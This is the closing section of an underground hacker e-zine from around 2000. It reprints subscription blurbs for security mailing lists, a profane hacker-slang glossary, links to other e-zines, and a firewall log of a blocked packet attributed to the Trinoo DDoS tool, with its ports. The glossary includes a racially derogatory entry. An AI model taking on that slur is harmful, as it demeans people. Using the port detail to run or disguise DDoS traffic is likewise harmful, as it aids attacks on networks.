3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
--
defaced alpha [web page defacement announce list]
This is a low traffic mail list to announce via alpha-numeric
pagers, all publicly defaced government and military domains
on a given day. To subscribe to Defaced-Alpha, send mail to
majordomo@attrition.org with "subscribe defaced-alpha" in
the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the information
will only include domain names. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks. Further, it is designed for
quick response and aimed at law enforcement agencies like
DCIS and the FBI.
To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within
12 hours of receiving the mail to be subscribed. If the response
is not received, it is assumed the mail was not sent to your
pager.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without
your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
Win2k Security Advice Mailing List (new added Nov 30th 1999)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To subscribe:
send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
to listserv@listserv.ntsecurity.net
Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
questions or comments about the list please feel free to contact the list
moderator, Steve Manzuik, at steve@win2ksecadvice.net.
To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
==============
NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list. This new moderated mailing list,
Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
discussion of Windows-related security issues.
With a firm and unwavering commitment towards timely full disclosure, this
new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits, virus,
worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
and we openly invite all security minded individuals, be they white hat,
gray hat, or black hat, to join the new mailing list.
While Win2KSecAdvice was named in the spirit of Microsoft's impending product
line name change, and meant to reflect the list's security focus both now and
in the long run, it is by no means limited to security topics centered around
Windows 2000. Any security issues that pertain to Windows-based networking are
relevant for discussion, including all Windows operating systems, MS Office,
MS BackOffice, and all related third party applications and hardware.
The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
a security risk, it's relevant to the list.
The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable list
archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:
To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net
To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net
Regards,
Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net
@HWA
A.9 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ ___ ___ _____ _ ___
| | | \ \ / / \ | ___/ \ / _ \
| |_| |\ \ /\ / / _ \ | |_ / _ \| | | |
| _ | \ V V / ___ \ _| _/ ___ \ |_| |
|_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus,
Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
A.11 NEW Underground E-Zines
~~~~~~~~~~~~~~~~~~~~~~~
New releases:
SET Saqueadores Edici�n T�cnica: http://www.set-ezine.org
f41th magazine issue 12 is out.: http://f41th.com/index2.html
Digital Defiance 5 (!) is out..: http://www.hackers.cx
New zines on the scene:
InET.......................... http://www.warpedreality.com/inet
Hack In the Box............... http://www.thelimit.net/hitb
Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt
DataZine...................... http://www.tdcore.com
Napalm........................ http://napalm.firest0rm.org/
Digital Defiance.............. http://www.hackers.cx
@HWA
2000-03-19 22:11:38, 2001524, Trinoo master activity, 24.x.x.x,
CR900935-A, x.x.x.x, data=png_l44adsl, 1
Name Packet sent from x.x.x.x (UDP Port 31335) to x.x.x.x (UDP Port 27444) was blocked
Status Dropped
Source IP Address x.x.x.x
Destination IP Address x.x.x.x
Source Port 31335
Destination Port 27444
Link Layer Protocol 1
Network Layer Protocol 1
Transport Layer Protocol 1
Count 1
Status Code 100002
Lock Level 0
Security Information 0,1,0,2
Operating System Windows NT-5.0.2195--SP
Product ZoneAlarm
phear the weekend kiddy scans ...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]